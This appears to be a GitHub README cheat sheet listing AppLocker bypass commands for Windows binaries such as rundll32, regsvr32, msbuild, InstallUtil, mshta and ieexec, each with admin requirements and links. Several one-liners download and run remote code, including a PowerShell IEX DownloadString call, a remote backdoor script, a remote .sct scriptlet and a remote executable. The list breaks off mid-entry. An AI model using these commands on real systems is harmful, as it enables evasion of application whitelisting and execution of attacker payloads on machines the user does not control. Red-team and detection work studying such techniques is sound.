myAPPLockerBypassSummary

Simple APPLocker bypass summary based on the extensive work of @api0cradle

Rundll32.exe

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

rundll32.exe javascript:"..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");window.close()");

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")

rundll32 shell32.dll,Control_RunDLL payload.dll

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: No

Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.

Links:
- https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

Regsvr32.exe

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: No

Notes: I only tested on Windows 10 against the default rules, it could work against older Windows versions.

Links:
- https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md

Msbuild.exe

msbuild.exe pshell.xml

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes

Notes:

Links:
- https://gist.github.com/subTee/6b236083da2fd6ddff216e434f257614
- http://subt0x10.blogspot.no/2017/04/bypassing-application-whitelisting.html
- https://github.com/Cn33liz/MSBuildShell
- https://github.com/Cn33liz/MS17-012
- https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
- https://www.youtube.com/watch?v=aSDEAPXaz28
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

Regsvcs.exe

regsvcs.exe /U regsvcs.dll

regsvcs.exe regsvcs.dll

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes

Notes:

Links:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

Regasm.exe

regasm.exe /U regsvcs.dll

regasm.exe regsvcs.dll

Requires admin: /U does not require admin
Windows binary: Yes
Bypasses AppLocker Default rules: Yes

Notes:

Links:
- https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

Bginfo.exe

bginfo.exe bginfo.bgi /popup /nolicprompt

Requires admin: No
Windows binary: No
Bypasses AppLocker Default rules: No

Notes: Will work if BGinfo.exe is located in a path that is trusted by the policy.

Links:
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
- https://oddvar.moe/2017/05/22/clarification-bginfo-4-22-applocker-still-vulnerable/
- https://pentestlab.blog/2017/06/05/applocker-bypass-bginfo/

InstallUtil.exe

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes

Notes:

Links:
- https://github.com/subTee/AllTheThings
- https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
- http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
- https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/

MSDT.exe

Open .diagcab package

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

mshta.exe

mshta.exe evilfile.hta

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: Yes

Notes:

Links:
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

Execute .Bat

cmd.exe /k < script.txt

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: No

Notes:

Links:
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

Execute .PS1

Get-Content script.txt | iex

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: No

Notes:

Links:
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

Execute .VBS

cscript.exe //E:vbscript script.txt

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: No

Notes:

Links:
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_3
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

PresentationHost.exe

Missing Example

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

dfsvc.exe

Missing Example

Requires admin: ?
Windows binary: Yes
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf

IEExec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

Requires admin: ?
Windows binary: Yes
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

cdb.exe

cdb.exe -cf x64_calc.wds -o notepad.exe

Requires admin: ?
Windows binary: No
Bypasses AppLocker Default rules: ?

Notes:

Links:
- http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

dnx.exe

dnx.exe consoleapp

Requires admin: ?
Windows binary: No
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

rcsi.exe

rcsi.exe bypass.csx

Requires admin: ?
Windows binary: No
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

csi.exe

Missing example

Requires admin: ?
Windows binary: No
Bypasses AppLocker Default rules: ?

Notes:

Links:
- https://web.archive.org/web/20161008143428/
- http://subt0x10.blogspot.com/2016/09/application-whitelisting-bypass-csiexe.html

CPL loading location manipulation

Control.exe

Requires admin: No
Windows binary: Yes
Bypasses AppLocker Default ru

MyAPPLockerBypassSummary

Install / Use

README

myAPPLockerBypassSummary